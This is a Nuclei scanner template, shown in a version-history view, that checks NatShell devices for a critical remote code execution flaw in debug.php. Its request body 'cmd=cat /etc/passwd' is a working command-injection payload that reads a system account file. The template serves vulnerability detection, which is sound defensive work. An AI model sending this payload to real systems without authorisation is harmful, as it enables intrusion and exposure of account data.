nuclei-templates/http/vulnerabilities/other/natshell-rce.yaml

37 lines
744 B
YAML
Raw Normal View History

2021-05-28 05:42:36 +00:00
id: natshell-rce
2021-05-27 14:59:33 +00:00
info:
name: NatShell Debug File - Remote Code Execution
2021-05-27 14:59:33 +00:00
author: pikpikcu
2021-05-27 19:49:17 +00:00
severity: critical
2022-05-31 08:52:28 +00:00
description: |
The NatShell debug file is susceptible to a remote code execution vulnerability.
reference:
- https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-77
2021-05-27 14:59:33 +00:00
tags: natshell,rce
metadata:
max-request: 1
2021-05-27 14:59:33 +00:00
http:
2021-05-27 19:49:17 +00:00
- method: POST
2021-05-27 14:59:33 +00:00
path:
- "{{BaseURL}}/debug.php"
body: |
cmd=cat /etc/passwd
matchers-condition: and
matchers:
- type: regex
2022-05-31 08:52:28 +00:00
part: body
2021-05-27 14:59:33 +00:00
regex:
- "toor:[x*]:0:0"
- type: status
status:
- 200